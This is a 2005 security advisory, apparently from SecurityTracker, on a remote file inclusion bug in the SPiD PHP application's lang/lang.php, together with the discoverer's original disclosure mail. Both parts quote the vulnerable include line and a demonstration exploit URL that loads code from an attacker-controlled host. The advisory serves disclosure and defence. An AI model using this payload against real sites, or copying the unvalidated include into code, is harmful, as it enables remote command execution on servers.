SPiD Include File Bug Lets Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1014437 |
|
SecurityTracker URL: http://securitytracker.com/id/1014437
|
|
CVE Reference:
CVE-2005-2198
(Links to External Site)
|
Updated: Jun 15 2008
|
Original Entry Date: Jul 10 2005
|
Impact:
Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
|
Description:
V4mu from Anomaly 1n The System reported a vulnerability in SPiD. A remote user can execute arbitrary commands on the target system.
The 'lang/lang.php' script includes the 'lang_EN.php' file relative to the user-supplied 'lang_path' parameter without validating the input. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/[path-to-spid]/lang/lang.php?lang_path=http://[attacker]
|
Impact:
A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: spid.adnx.net/ (Links to External Site)
|
Cause:
Input validation error, State error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Sat, 9 Jul 2005 11:15:20 -0300
Subject: spid remote file inclusion
|
SPID has a remote file inclusion founded by
V4mu from Anomaly 1n The System
vendor: http://spid.adnx.net
the bug is in lang/lang.php line 8:
include($lang_path."lang_EN.php");
Exploit:
www.target.com/[path-to-spid]/lang/lang.php?lang_path=http://[attacker]
------------------------------------------------------------------------------------------------------------------------
[A]nomaly [1]n [T]he [S]ystem
We are:
V4mu <*> S0l4r1s <*> r3ckd4ll <*> paulinhu <*> nicked
www.a1ts.org
|
|
